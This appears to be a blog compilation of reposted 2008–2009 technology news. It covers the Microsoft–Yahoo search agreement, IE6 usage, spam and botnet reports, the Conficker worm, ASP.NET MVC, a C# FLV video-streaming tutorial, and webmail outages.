• At full implementation (expected to occur within 24 months following regulatory approval), Yahoo! estimates, based on current levels of revenue and current operating expenses, that this agreement will provide a benefit to annual GAAP operating income of approximately $500 million and capital expenditure savings of approximately $200 million. Yahoo! also estimates that this agreement will provide a benefit to annual operating cash flow of approximately $275 million.

• The agreement protects consumer privacy by limiting the data shared between the companies to the minimum necessary to operate and improve the combined search platform, and restricts the use of search data shared between the companies. The agreement maintains the industry-leading privacy practices that each company follows today.

The agreement does not cover each company's web properties and products, email, instant messaging, display advertising, or any other aspect of the companies' businesses. In those areas, the companies will continue to compete vigorously.

The transaction will be subject to regulatory review. The agreement entered into today anticipates that the parties will enter into more detailed definitive agreements prior to closing. Microsoft and Yahoo! expect the agreement to be closely reviewed by the industry and government regulators, and welcome questions. The companies are hopeful that closing can occur in early 2010.

The companies have established a website at http://www.choicevalueinnovation.com to provide consumers, advertisers and publishers with additional information about the benefits of the agreement.

Conference Call – 5:30 a.m. PDT, Wednesday, July 29

Yahoo! and Microsoft will host a conference call with Yahoo! CEO Carol Bartz and Microsoft CEO Steve Ballmer to discuss the agreement at 5:30 a.m. Pacific/8:30 a.m. Eastern Time today. To listen to the call, please dial 1-866-515-2908 in the U.S. and Canada; +1-617-399-5122 international, reservation number: 47968026. A live webcast of the call can be accessed through Yahoo!’s Investor Relations website at http://yhoo.client.shareholder.com/results.cfm. The companies have also established a website at http://www.choicevalueinnovation.com to provide consumers, advertisers and publishers with additional information about the benefits of the agreement. In addition, an archive of the webcast will be available through the same link. An audio replay of the call will be available for two weeks following the conference call by calling 1-888-286-8010 in the U.S. and Canada; +1-617-801-6888 international, reservation number: 91217610.

Non-GAAP Financial Measures

This release refers to operating cash flow (operating income before depreciation, amortization of intangible assets, and stock-based compensation expense, or OCF), which is a non-GAAP financial measure. The most comparable GAAP measure is income from operations. The estimated annual OCF benefit of $275 million included in this press release is the estimated annual benefit in income from operations of $500 million less approximately $225 million of estimated annual savings in depreciation, amortization and stock-based compensation expense.

Source: http://www.choicevalueinnovation.com

Today's browser wars are nothing like the early browser wars of the mid '90s, but there are still plenty of casualties and lots of underlying uncertainty. However, there may be a bright spot on the horizon.

Current Browser Rankings

Based upon relatively recent data from Net Applications, there are really only four main browsers in the game today: Internet Explorer (IE) with roughly 66% of the market, Firefox with 22% of the market, Safari at 8% control, and Chrome with almost 2% of the market. Opera and all other browsers combined come in at only 2% of the market, even though the way that many of these browsers emulate other, better-known, user-agent strings to identify themselves might mean that they actually control a bit more of the market than is immediately obvious. But, even so, that really only leaves IE, FireFox, and Safari as the primary combatants.

Things get interesting though when you break down usage among versions of IE, especially if you start comparing those percentages against other browsers. At this point, no single browser is able to claim a true majority of Internet users. In fact, it becomes a rough-and-tumble race for supremacy. For example, IE 7 is the current, dominant, flavor of Internet Explorer - with roughly 27% market share. That puts it in roughly the same league as Firefox. Whereas IE 8, which seems to be seeing some decent yet rather slow adoption (among IE 7 users) comes in at 12%, roughly in the same league as Safari.

That leaves that ponderously old and terribly despised (by web developers at least) beast known as IE 6 still commanding roughly 20% of overall market share.

Internet Explorer 6 is Old, Beastly, and Holds the Future of the Web

IE 6 was released in August of 2001—it's now been around a little under 8 years, which is an eternity in Internet time. Yet it's still going strong with roughly 20% of the overall browser market. Of course, what's unknown is how many of those still on IE 6 are using it explicitly to maintain backward compatibility with their own internal web applications, or how many of them are either lazy users who can't be bothered to upgrade, or simply don't care about upgrading. Even though Microsoft clearly has upgrade paths for these users many haven't taken advantage of those paths (IE 7 and now IE 8) over the years.

I think it’s ironic that IE 6 users hold the key to the future of the web, at least in terms of which browsers will gain dominance. The 20% of users running IE6 today represent veterans of a browser war that was fought (and won by Microsoft) nearly a decade ago. And what these users choose as their next browser could have a big impact on which browser emerges victorious in the current skirmish we're seeing among IE, Firefox, Safari, and even Chrome.

On the one hand, if the majority of IE 6 users are just lazy or don't know how to upgrade, it's relatively safe to assume that they'll just upgrade to IE 8 as they become aware of easy upgrade options (or get new machines, though some could convert to Safari in this process). On the other hand, if the majority of these users explicitly need IE 6 to make corporate sites work correctly, then it's conceivable that many will like stay on current hardware, use IE 6 for their apps, and install Firefox or Chrome along with IE6 for any of the more modern browsing needs they may have. Either way, there's a large segment of users out there who can have a big impact on where things head in the future. As more and more pressure mounts on those users to switch or upgrade it will be interesting to see what happens, especially considering some of the recent turbulence in this arena (that has apparently been so big that it's caused Net Application Data to review their most recent numbers for a few days now).

Ditching IE 6

It's no secret, of course, that IE6 has long been viewed quite critically by web developers. In fact, it's probably safe to say that most web developers despise it. A key reason for that less than amicable sentiment is the amount of tweaking and hacking it takes to get new sites and content to work in IE 6. Or, as more than one sarcastic comment on http://www.saveie6.com/ points out, with IE6 out of the mix web developers and designers might end up going bankrupt as they'd lose half of all of their billable hours trying translate their sites and designs to render correctly on IE 6.

As a developer who has spent way too much time battling CSS hacks and other problems with sites for rendering in IE 6, I'd only be too happy if IE 6 would go away tomorrow. Sadly, it looks like that won't be the case, and I've checked browser statistics on a couple of the sites I work with over the past few months to see how soon I could begin possibly ignoring IE6 traffic. But sadly, on most of the sites I work with or maintain, IE 6 still represents 10-20% of the traffic, which is truly heartbreaking for me.

I relished a decision by YouTube to discontinue support for IE 6 relatively shortly. Even better, this news comes on the heels of other reports pointing out that other sites will be dropping support for IE6 as well.

Of course, as much as I could hope that this would trigger a cascade of other sites deciding to similarly pull support (making it easier for me to do the same), it's probably worth remembering that if the majority of IE 6 users are truly using IE 6 to explicitly maintain compatibility with their own intranet or business applications, then the content on YouTube or Digg likely isn't going to be a huge loss to these users. But we can always hope.

The Future of IE 6

What does all of this mean for web developers? Not a lot at this exact moment. Someday we might hit that bright-spot where we no longer need to waste time making sites work in IE 6. If enough sites take a cue from YouTube and Digg (and hopefully a few will) that might drive some momentum for change. That, in turn, could propel some IE 6 users to jump ship, changing the balance even more dramatically. When that happens, we'll be that much closer to cutting out a huge amount of effort when it comes to web development in general.

Source: http://www.devproconnections.com

The people who run the world's internet systems are a rather secretive bunch.  Three times a year, senior technical officers from companies such as Google, Yahoo, AT&T, Comcast and Verizon meet to discuss ways of stopping the internet from being swamped by rising levels of spam, viruses and hacking attacks by organised criminals. They do not generally like discussing these meetings.  "Some people might get nervous if they knew all the things we talked about," said Michael O'Rierdan, chairman of the Messaging Anti-Abuse Working Group (MAAWG). "It’s our job to make the internet safe, but we don't want to put people off using the web."  They are also worried about being targeted by the cyber-criminals they are trying to thwart.

Most of the spam and hacking on the internet is run by organised crime rings. There is an underground economy that hacks into computers, sells stolen identities and orchestrates the sending of spam e-mails about everything from fake Viagra pills to banking scams. There is a lot of money at stake in keeping these operations running.  “We get threats every day," said Larry, chief technical officer of Spamhaus, a non-profit organisation that exposes spammers. He prefers not to reveal his surname. "In the US it is people bringing lawsuits against us. And then there are organised criminals in Russia and Ukraine, who use different methods."  Steve Linford, the organisation's founder, has been advised by police not to open unexpected packages arriving at his home.

MAAWG meetings are also places to discuss some of the controversial measures that internet companies need to take in the fight against spam, such as blocking some types of e-mail traffic. This measure sits awkwardly with civil liberties bodies.  The 270 delegates from 19 countries who met at Amsterdam's venerable Hotel Krasnapolsky last week were far from the usual, suit-wearing conference crowd. An eclectic mix of tattoos, ponytails, high-waisted trousers and backpacks indicated that these were true operations people who work in the bowels of the network.  Membership is strictly vetted and journalists are not normally invited to attend, but MAAWG has started to lift its veil a little. There is a growing feeling that the industry must reach out to consumers and get them to help fight cyber-crime.

In 2008, 349.6bn spam messages were sent across the internet, according to Symantec, the internet security company. Spam accounts for an average of almost 94 per cent of all e-mail messages.  Nearly 90 per cent of spam is sent from computers that have been hacked into and are being remotely programmed to send out spam.  More than 9.4m computers have been hijacked in this way and their owners are usually entirely unaware it is going on. It will be impossible to clean up these machines without talking to consumers.

"Sometimes we want people to know what we are doing, so they can yell at the politicians to give us more help," said Jerry Upton, executive director of MAAWG.  There is a rising sense of crisis among internet companies about the cost of spam. Few are willing to quantify how much they have to spend to fight spam, but Mr O'Rierdan estimated that big internet service providers employ five to 10 staff just to look at spam. In addition they must buy spare servers, routers and other equipment to cope with the volumes of junk mail, buy spam-filtering software and run support centers for their customers.

Viriya Upatising, chief technical officer of True Internet, a Thai internet service provider, said junk mail was a crippling cost for the company because it was paying to send the unwanted data across undersea cable connections to destinations such as the US and Europe.  "The cost of bandwidth is expensive in Asia," Mr Upatising said. "It costs us $250 per megabit per month to send data internationally."  The company put in place a draconian system that prevents suspected spammers from using its network. The measures have cut unwanted messages from 3.5m a day to a more manageable 250,000.

"We are all sharing these costs," said Patrick Peterson, chief technology officer at Ironport Systems, Cisco's e-mail security arm. "Spam is a stealth tax on consumers. ISPs have to pay for the spam, for the extra bandwidth, for equipment, and they are forced to put up their prices for consumers."

There is a fear among internet security professionals that they might be losing the battle to cyber-criminals. This may also be why they now want the public to know more about what they do, to show they have at least tried.  "I don't know if we can control it," said Dave Crocker, one of the early pioneers of e-mail and now a senior technical adviser to MAAWG.  He added: "It is an arms race. We are getting better at filtering out rogue messages but every day the criminals get better too, and they are better organized and more aggressive."

Keywords: the dark side of the web

* Spam: Unsolicited electronic messages, most commonly e-mail, but also increasingly common in instant messaging, blogs and mobile phone messages. The first e-mail spam is believed to have been sent in 1978.

* Malware: Malicious software designed to infiltrate or damage a computer system without the owners' consent. Symantec, the internet security company, has estimated there is now more malware released each year than legitimate software programs. There are many different types of malware, including viruses, worms and Trojan horses.

* Phishing : The fraudulent attempt to acquire sensitive information such as passwords, bank account details and credit card numbers. Typically it is in the form of an e-mail that directs people to a fake website - that looks like the legitimate site of a bank or other trusted organisation - where people are asked to enter personal details.

* Botnets: A network of computers that have been hacked and are being remotely controlled by cyber-criminals. Typically they are used to send out spam messages or viruses in large numbers. Most users will be unaware if their computer has been infiltrated and added to a botnet. Symantec estimated there were more than 9.4m machines hijacked in this way in 2008.

Source: http://www.ft.com

Microsoft will begin offering its first hosted security service under the Forefront brand on Thursday, dubbed Forefront Online Security for Exchange and designed to help keep malware and spam out of e-mail in-boxes.

The hosted service, which will cost $20 per user per year or less based on volume licensing, targets enterprise Exchange customers and includes a Web-based console for setting up policies for virus and spam protection, said Doug Leland, general manager of Microsoft's Identity and Security Business Group.

The releases will follow the timeline of Exchange 2010, which entered public beta this week. More hosted security services will be coming but Leland declined to elaborate.

Microsoft also will finally release on Thursday a new, public beta version of its Stirling security suite, which is the next generation of the Forefront software.

The initial beta version of Stirling was released a year ago and was supposed to be refreshed by the end of 2008. It will include client, server, and application security technology and offer a single management console.

Stirling components will come in staggered releases starting later this year with Forefront Security for Exchange and Threat Management and continuing through the first half of 2010, Leland said. The company also is changing the name of its Identity Lifecycle Manager product to Forefront Identity Manager and plans to offer a new set of technologies, code-named Geneva, for helping corporations improve the security of software and services, Microsoft said.

In addition, Microsoft said it is investing $75 million in a partner ecosystem, including making a strategic partnership with RSA. Other companies integrating with Stirling include Kaspersky, Brocade, Juniper Networks, Guardium, Imperva, Sourcefire, StillSecure, Q1 Labs, and Tipping Point.

The moves are part of the company's strategy to provide "Business Ready Security."

The moves are part of Microsoft's effort to broaden the scope of its security offerings to incorporate data protection, access and management, all built around the concept of identity, Leland said.

Microsoft wants to offer the ability for corporations to set "fine-grained security policies and have a deeper understanding about who in the organization is triyng to access data and what they are trying to do with it," he said.

Source: http://news.cnet.com

[Update]: Forefront Online Security for Exchange is not only limited to Exchange Server, it can be used by all other mail server.

More than 97% of all e-mails sent over the net are unwanted, according to a Microsoft security report.

The e-mails are dominated by spam adverts for drugs, and general product pitches and often have malicious attachments.

The report found that the global ratio of infected machines was 8.6 for every 1,000 uninfected machines.

It also found that Office document attachments and PDF files were increasingly being targeted by hackers.

Microsoft said people should not panic about the high levels of unwanted e-mail.

Cliff Evans, head of security and privacy for Microsoft in the UK, told BBC News: "The good news is that the majority of that never hits your inbox although some will get through."

Ed Gibson, chief cyber security advisor at Microsoft, said the rise in spam was due to traditional organised crime figures moving away from exploiting software vulnerabilities and "targeting the weak link that is you and me".

"With higher capacity broadband and better OS (operating systems), and higher power computers it is easier now to send out billions of spams. Three or four years ago the capacity wasn't there."

Malware ecosystem

Paul Woods, senior analyst at e-mail security firm Message Labs, said he was surprised the Microsoft figure for unwanted e-mail was so high.

"Our own analysis shows that around 81% of e-mail traffic we were processing was identified as spam and unwanted," he said.

MessageLabs said spam rates had fallen at the end of 2008 as an ISP which had been hijacked to send out spam mails to users had been taken offline.

"As a result of that, a number of developers in botnet technology at the end of last year were trying to regain botnet control and increase capacity and return to previous spam levels.

"It wont be far off before we see return to those levels."

The report, which looked at online activity during the second half of 2008, also pinpoints the countries that are suffering from the most infections of malicious software, or malware.

Russia and Brazil top the global chart of infections, followed by Turkey and Serbia and Montenegro.

It said that the type of malware varied from country to country.

"As the malware ecosystem becomes more reliant on social engineering, threats worldwide have become more dependent on language and cultural factors," it reported.

In China, several malicious web browser modifiers are common, while in Brazil, malware that targets users of online banks is more widespread.

In Korea, viruses such as Win32/Virut and Win32/Parite are common.

Global average

The global average for infected machines is 8.6 for every 1,000 uninfected PCs.

The UK's infection rate is 5.7, according to the Microsoft report.

The report highlighted the need to keep operating systems, web browsers and applications up to date with the latest versions.

Increasingly, hackers are using common file formats, such as Microsoft Office documents and Adobe's PDF format as the carrier of malicious exploits or programs.

More than 91% of attacks exploiting vulnerabilities in Microsoft Office were using security holes that had been plugged by updates that had been available for more than two years.

Attacks using PDF files rose sharply in the second half of 2008, the report noted.

The vulnerabilities all of the attacks exploited had already been fixed by Adobe, and were not present in the most recent versions of the software.

Mr Gibson told BBC News people had to be aware that if they did not update their applications, such as Office and Adobe, they were not just putting themselves at risk, but others on the internet also.

"If you don't update your software you are not just a hazard to yourself, you are hazard to others because you can be part of a botnet [if your computer is hijacked]."

Mr Evans said Microsoft was very happy with the approach consumers were taking to updating applications via automatic updates.

"For consumers it is happening but for business less so. We have encourage businesses to make more use of automatic updates."

Scareware

Mr Woods said malicious hackers were exploiting Office document attachments and PDF files in order to make more targeted attacks.

"They tend to be used in selective attacks to named individuals in organisations.

"A lot of social engineering will be used to appear legitimate and convince a user to open the attachment

"Once opened, a vulnerability in the application used to open the document will be exploited and often a tiny piece of code will execute and then download a larger file from a rogue website.

"This program will then attempt to search the computer for a particular document or file and sent it to a remote PC."

The report also highlighted the rise in the use of so-called scareware, fake security programs which falsely tell people they need to install software which does nothing other than attempt to steal personal details from a users' PC.

"It's criminals playing on people's fears," said Mr Evans.

"The advice remains the same - ensuring you have up to date software, whether that's your applications, your browser or your OS."

Source: http://news.bbc.co.uk

Remember the dire predictions surrounding the "millennium bug?" The doom-and-gloom scenarios bandied about by security analysts on how computers could act when their clocks turned to January 1, 2000?

Well, researchers are hoping that a potential April Fools' time bomb -- the Conficker.c that is supposed to hit computers on April 1 -- turns out to be equally unfounded.

But realizing that hope alone is not a prudent option, here is a primer on the worm so you can adequately prepare yourself -- and your computer.

Computer users will not know that Conficker.c has infected their machine.

What is Conficker.c and what do analysts fear it may do?

Conficker.c is a worm, a malicious program thought to have already infected between 5 million and 10 million computers.

Those infections haven't spawned many symptoms, but on April 1 a master computer is scheduled to gain control of these zombie machines, said Don DeBolt, director of threat research for CA, a New York-based IT and software company.

What happens on April Fools' Day is anyone's guess.

The program could delete all of the files on a person's computer, use zombie PCs -- those controlled by a master -- to overwhelm and shut down Web sites or monitor a person's keyboard strokes to collect private information like passwords or bank account information, experts said.

More likely, though, said DeBolt, the virus may try to get computer users to buy fake software or spend money on other phony products.

Experts said computer hackers largely have moved away from showboating and causing random trouble. They now usually try to make money off their viral programs

How does the Conficker.c work?

Conficker.c imbeds itself deep in the computer where it is difficult to track. The program, for instance, stops Windows from conducting automatic updates that could prevent it from causing damage.

The program's code is also written to evolve over time and its author appears to be making updates to thwart attempts to neuter the worm.

Who wrote the program?

It's unclear who wrote the program, but anti-work researchers -- a group calling itself the Conficker Cabal -- are looking for clues.

First, they know that some recent programs have come from Eastern European countries outside the jurisdiction of the European Union, said Patrick Morganelli, senior vice president of technology for Enigma Software.

Worm program authors often hide in those countries to stay out of sight from law enforcement, he said.

In a way, the Conficker Cabal is also looking for the program author's fingerprints. DeBolt said security researchers are looking through old programs to see if their programming styles are similar to that of Conficker C.

The prospects for catching the program's author are not good, Morganelli said. "Unless they open their mouth, they'll never be found," he said.

So, the most effective counter-assault simply may be damage control.

How can I tell if my computer's infected?

One quick way to see if your computer has been infected is to see if you have gotten automatic updates from Windows in March. If so, your computer likely is fine, DeBolt said.

Microsoft released a statement saying the company "is actively working with the industry to mitigate the spread of the worm."

Users who haven't gotten the latest Windows updates should go to http://safety.live.com if they fear they're infected, the company's statement says.

People who use other antivirus software should check to make sure they've received the latest updates, which also could have been disabled by Conficker.c.

How did the worm evolve?

The first version of Conficker -- strain A -- was released in late 2008. That version used 250 Web addresses -- generated daily by the system -- as the means of communication between the master computer and its zombies.

The end goal of the first line was to sell computer users fake antivirus software, said Morganelli.

Computer security experts largely patched that problem by working with the Internet Corporation for Assigned Names and Numbers to disable or buy the problematic URLs, he said.

A second variant, Conficker.b, was released in January and infected millions more machines.

The Conficker, strain C, will generate 50,000 URLs per day instead of just 250 when it becomes active, DeBolt said.

What is being done to fight Conficker?

Members are searching for the malicious software program's author and for ways to do damage control if he or she can't be stopped.

They're motivated in part by a $250,000 bounty from Microsoft.

Source: http://www.cnn.com

As part of Scott Guthrie's keynote March 18th at Mix 2009, Microsoft announced the final release of ASP.NET Model View Controller (MVC). If you haven't had a chance to look at it yet, now is your chance as it's officially out of beta and into full production.

ASP.NET MVC—Why All the Hype?

In case you haven't heard, Microsoft has made it abundantly clear that ASP.NET MVC isn't designed to replace ASP.NET Webforms development. Instead, it's another option that Microsoft is making available to developers. This is similar to Microsoft's decision to allow developers to code in both Visual Basic and C# - the idea being that developers chose what best meets their needs and particular styles.

Personally, I'll never go back to WebForms, because I'm sold on the way MVC solutions give me complete control over my markup, facilitate testing, and allow greater control over URL routing while making my code much more modular (which in turn, makes it easier to manage and extend). So, while MVC development might not be for everyone, it's definitely for me, and I'm completely sold on it.

ASP. NET MVC as a Testament to Innovation at Microsoft

But what I really love the most about ASP.NET MVC (in addition to all of the time it saves me as a developer), is that it's a perfect example of some very new, and innovative, approaches that Microsoft has taken in regards to addressing business and the web in general. Once upon a time, Microsoft's approach to the web and competing products and platforms basically consisted of doing nothing more than pretending that those offerings didn't exist. You can see some examples of this mindset by visiting some parts of the Microsoft corporate site, where many pages and applications simply don't work correctly with browers other than Internet Explorer. Likewise, this mindset was also at the heart (in my opinion) of much of the complaints leveled at Microsoft for being nonconformant with industry accepted standards.

But the MVC is part of a vanguard of new products and services delivered by Microsoft  where the company seems to take an entirely different approach. Rather than simply pretending that other offerings don't exist, this approach focuses on accepting the strengths of other platforms, analyzing those strengths, rolling them into Microsoft products where applicable, and then building supporting and competing Microsoft products that developers, and IT professionals, just can't do without.

IIS 7, for example, no longer pretends that PHP doesn't exist. Instead, it fully embraces it, and is striving to provide such a powerful hosting platform for it that businesses will choose to run PHP on IIS7 given the ease of management, extensibility, and flexibility that they'll enjoy from hosting PHP on a Windows Server. And if Microsoft is able to deliver? Then businesses will be buying Windows Server licenses for their web workloads, instead of using Apache licenses. It's a bold business approach to be sure, but I much prefer this approach to meeting the competition head-on, rather than watching Microsoft merely burying its head in the sand.

What's better though, is that it appears that as Microsoft continues to take this head-on business approach, we're finally starting to see some really innovative things coming out of Redmond. And in my mind, a prime example of that innovation has been the effort and energy devoted to the creation of ASP.NET MVC functionality. As an ASPInsider, I've been able to see just how innovative the ASP.NET team working on this project has been - and how careful they've been in creating this platform in order to ensure that it really, and truly, met real-world business needs.

A further example of how this innovation and its associated paradigm shift is taking root at Microsoft is the BizSpark program, which takes a very aggressive approach at preventing start-ups from courting the LAMP stack as a cheaper alternative to the Microsoft Stack by giving them three years to use Microsoft products and licenses for free.

And, if you think that I've possibly gone off the deep-end, or imbibed a bit too much of the Microsoft Kool-Aid, make sure to check out Bill Buxton and Scott Guthrie's Keynote from Mix '09. Here’s the link: http://live.visitmix.com/. You’ll need to mouse over the player, select the Other Videos option, and select the Day1 Keynote.

Unless there's something seriously wrong with you, this keynote will get you excited about development again, and it will totally make you rethink your relationship with Microsoft. You'll also see some great examples of real-life innovation.

Getting Started with ASP.NET MVC

As for ASP.NET MVC itself, if you've been waiting for it to mature a bit before playing with it (or just haven't had the time yet), now is a great time to pull it down and try it out. It now has a brand new portal page on the www.asp.net web site itself, and there are also a number of great videos that will help you get quickly spun up on how it works, and what it does. In fact, if you'd like a very quick overview of how MVC applications work, make sure to check out Stephen Walther's new video that shows a start-to-finish MVC app.

Likewise, one of the great things about MVC development is that it's insanely extensible and lends itself very well to customizations and tweaks. I've leveraged these capabilities extensively in my own projects, and a huge resource that's helped me in doing so has been access to the actual source code for ASP.NET MVC itself - which you can peruse (or even download) from the codeplex site.

Another resource that you'll want to pay attention to if you're interested in MVC development is MVCContrib, which is an extensive suite of open-source extensions and augmentations that can be used to improve MVC development. I've also found that Phil Haack’s and Rob Conery's blogs are great resources; they document some MVC features and functionality. But more importantly, these blogs are great resources in terms of explaining why certain features are implemented as they are. The resulting transparency from those blogs helps (in my mind) play a big part in much of the innovative spirit that makes MVC and other recent releases from Microsoft so exciting and refreshing.

Source: http://www.devproconnections.com/

This tutorial is about how to configure your web server to stream your own movies on your web page just like video.google.com does.

Requirements:

• Windows Server 2003
• IIS 5.0/6.0
• ffmpeg.exe (from http://ffmpeg.mplayerhq.hu or download latest beta version here)
• flvtool2 (from http://inlet-media.de/flvtool2)
• a GUI for ffmpeg (if you don't want to use the console, e.g. Avanti http://avanti.arrozcru.com)
• a FLV Streaming Player (e.g. FLV-Scrubber 3.0 by Fabian Topfstedt: http://topfstedt.de/FLVScrubber3/FLVScrubber.swf)
• a FLV Player (e.g. http://flv-player.softonic.de)
  

1. Configuring Windows Server 2003 and IIS

Add a new web site in your IIS and don't forget to select "Run Scripts (such as ASP)".

Using this HTTP handler you can easily FLV streaming downloads just like . All you need is to install on your IIS 5.0/6.0 the following HTTP handler and to get this to work correctly, you will need to make sure that IIS handles request for .flv files. In your site's properties, click the "Home directory tab" and click the "Configuration" button. You'll get a form like this:

Add the entry for .flv, click edit, and copy the path in the executable field. This is the aspnet_isapi.dll for the current version of the .NET Framework of your virtual site. Cancel out of that dialog and click "add." Paste the path into the executable, use the extension .flv and set your verbs limited to "GET, POST, HEAD, DEBUG" like this:

Now any request for a .flv file on the site will be handled by ASP.NET. Since the server-wide machine.config file doesn't specify what class should handle the request, a default handler is used unless we add the following lines to the web.config file (of your web site):

2. Coding

Web.config

<httpHandlers>
verb="*" path="*.flv" type="FLVStreaming" />
</httpHandlers>

FLVStreaming.cs

using System;
using System.IO;
using System.Web;
public class FLVStreaming : IHttpHandler
{

    // FLV header
private static readonly byte[] _flvheader = HexToByte("464C5601010000000900000009");

public FLVStreaming()
    {
    }
public void ProcessRequest(HttpContext context)
    {
try
{
int pos;
int length;
// Check start parameter if present
string filename = Path.GetFileName(context.Request.FilePath);
using (FileStream fs = new FileStream(context.Server.MapPath(filename), FileMode.Open, FileAccess.Read, FileShare.Read))
            {
string qs = context.Request.Params["start"];
if (string.IsNullOrEmpty(qs))
                {
                    pos = 0;
                    length = Convert.ToInt32(fs.Length);
                }
else
{
                    pos = Convert.ToInt32(qs);
                    length = Convert.ToInt32(fs.Length - pos) + _flvheader.Length;
                }
// Add HTTP header stuff: cache, content type and length       
context.Response.Cache.SetCacheability(HttpCacheability.Public);
                context.Response.Cache.SetLastModified(DateTime.Now);
                context.Response.AppendHeader("Content-Type", "video/x-flv");
                context.Response.AppendHeader("Content-Length", length.ToString());
// Append FLV header when sending partial file
if (pos > 0)
                {
                    context.Response.OutputStream.Write(_flvheader, 0, _flvheader.Length);
                    fs.Position = pos;
                }
// Read buffer and write stream to the response stream
const int buffersize = 16384;
byte[] buffer = new byte[buffersize];
int count = fs.Read(buffer, 0, buffersize);
while (count > 0)
                {
if (context.Response.IsClientConnected)
                    {
                        context.Response.OutputStream.Write(buffer, 0, count);
                        count = fs.Read(buffer, 0, buffersize);
                    }
else
{
                        count = -1;
                    }
                }
            }
        }
catch (Exception ex)
        {
            System.Diagnostics.Debug.WriteLine(ex.ToString());
        }
    }
public bool IsReusable
    {
get { return true; }
    }
private static byte[] HexToByte(string hexString)
    {
byte[] returnBytes = new byte[hexString.Length / 2];
for (int i = 0; i < returnBytes.Length; i++)
            returnBytes[i] = Convert.ToByte(hexString.Substring(i * 2, 2), 16);
return returnBytes;
    }

}

All you need now to stream your favorite FLV movies is a custom-made player which is fetching the contents passing to the request the ?start= parameter in order to seek the current position inside the video file.

Fabian Topfstedt has one available onto his site (get the player and place it in your site document root).

To use Fabian player you have to embed the following HTML code inside your page (and of course you should change the path to you .flv video and player):

 <object id="FLVScrubber" width="450" height="253" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0"><param name="movie" value="http://topfstedt.de/FLVScrubber3/FLVScrubber.swf"/><param name="bgcolor" value="#000000"/><param name="allowScriptAccess" value="sameDomain"/><param name="allowFullScreen" value="true"/><param name="flashVars" value="file=http://www.nibbler.at/republicofideas.flv&previewImage=http://nibbler.at/republicofideas.jpg"/><embed src="http://www.topfstedt.de/FLVScrubber3/FLVScrubber.swf" bgcolor="#000000" width="450" height="253" name="FLVScrubber" allowScriptAccess="sameDomain" allowFullScreen="true" flashVars="file=http://www.nibbler.at/republicofideas.flv&previewImage=http://nibbler.at/republicofideas.jpg" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer"></object>

There are three attributes of interest: Width and height define the resolution of FLV-Scrubber. If your videos’ native resolution is eg. 320×240 pixels, you might want to set width to 320 and height to 240. No problem if does not match, the video just will be scaled up or down. The third attribute is “flashvars”. That’s where you change the bahaviour and pass over information to FLVScrubber. You need to set at least file here, to link to the video you want to play. Everything else is optional (key/value pairs inside the flashvar attribute are separated using &). Here is a complete list:

• file=[URL] defines which video to show
• &autoStart lets the video start immediately
• &bufferTime=[number] changes the buffer time (default is 3 seconds)
• &clickTag=[URL] defines a target to call after video ended
• &credit=[(URL encoded) text] to show a credit like your company name in the context menu
• &link=[URL] defines a website to open when user clicks into the video
• &linkTarget=[blank,parent,self,top] defines the target of the website above (default: blank)
• &loop=true lets your video replay itself instead of ending (default: false)
• &previewImage=[URL] sets an backgroundimage as preview before playback starts
• &scrubbing=false use that, if you’re webserver has no enabled module for fake streaming (default: true)
• &seeking=false disallows the user to seek inside the video (default: true)
• &secondsToHide=[number] defines amount of seconds that the controlbar waits before hiding (0 means never, default is 5)
• &startAt=[number] defines the the second where the playback will start (default:0)

3. Converting your movie into FLV format

Now you need to convert/encode a video file (e.g. .avi) into a .flv by using ffmpeg and flvtool2 to index your in order to add the correct metadata inside the FLV file. You can do this by using the console (e.g):

ffmpege.exe -i test.avi test.flv
flvtool2.exe -U test.flv

or by using a GUI for ffmpeg like Avanti (http://avanti.arrozcru.com):

(don't forget to copy the ffmpeg.exe in your ../avanti/ffmpeg folder and load the "FLASH HQ" template from the Avanti menu). If you are a proud owner of Adobe Flash Professional 8 you can use the Flash 8 Video Encoder and you don't need ffmpeg and flvtool2 to encode and index your videos.

After encoding your video you can use a PLV Player (e.g. http://flv-player.softonic.de) to check if .flv file match your needs (e.g. correct resolution, bitrate...).

Now upload all file to your web server and your web site root should look like:

yourdirectory/App_Code/FLVStreaming.cs
yourdirectory/Web.Config
yourdirectory/default.htm
yourdirectory/FLVScrubber.swf
yourdirectory/yourmovie.flv

[QUOTE]
According to Commtouch Software, an average of about 10 million zombie computers worldwide are sending an average of 3 million messages every day. Some time periods indicate a collective peak spam output of 8 million to 10 million messages.

Many of those messages are sent through the top three web-based mail services. Gmail, operated by Google, ranks #3 among the top 10 origins for spam. Yahoo ranks #6, and Hotmail, operated by Microsoft, ranks #7. It's probably not coincidental that the rankings correspond to the popularity of each company's search engines and other online services.

The current top 2 offending domains origins are nearly unheard of by the majority of Internet users. Active-encounter.com, operated by marketing company iLead Media, ranks #1 and authentic-mechanic.com, registered to Tad Asaro, ranks #2. Asaro is registrant of the relatively new BabytoBee.com site.

Commtouch's cost calculator currently indicates that a company with 50 employees, each with an average salary of $50,000 per year, who also receive 25 messages per day - half of which are spam - would spent $14,300 per year as a direct result of dealing with spam.
[/QUOTE]

Source: windowsitpro.com

[QUOTE]
Apple's MobileMe and Google'sGmail online e-mail services suffered hours-long outages Monday, leaving millions of users unable to access their accounts.

Google restored service within about two and a half hours, but it took Apple approximately seven hours to restore full access to its online mail service.

Apple users first reported trouble accessing the service's servers from their desktop mail clients around 2 p.m. Eastern, and in the next several hours, posted several hundred messages on the MobileMe support forum about the outage.

A notice on the service's main support page acknowledged the problem. "MobileMe members are intermittently unable to access MobileMe Mail using a desktop e-mail application, iPhone or iPod touch," said Apple. "Access to www.me.com/mail is unaffected. Service will be restored ASAP. We apologize for any inconvenience."

By 9 p.m. Eastern that notice had been replaced with an all-clear indicator.

Google's Gmail, meanwhile, went offline around 5 p.m. Eastern, and greeted users with a message reading in part, "We're sorry, but your Gmail account is currently experiencing errors."

A little over two hours later, Google added a notice to its Gmail help page that attributed the outage to "the contacts system used by Gmail which is preventing Gmail from loading properly. We are starting to roll out a fix now and hope to have the problem resolved as quickly as possible."

Shortly after that, at about 7:30 p.m., Google declared the outage over. "Users who were temporarily affected by the 502 errors should now be able to access their account," read a message posted to the Gmail Help Discussion forum. "Thanks for your patience while we worked to resolve this issue for everyone."

Apple users were especially livid, in part because they, unlike Gmail's users, pay for their service, and also because of the multiple problems they had with MobileMe since its launch a month ago.

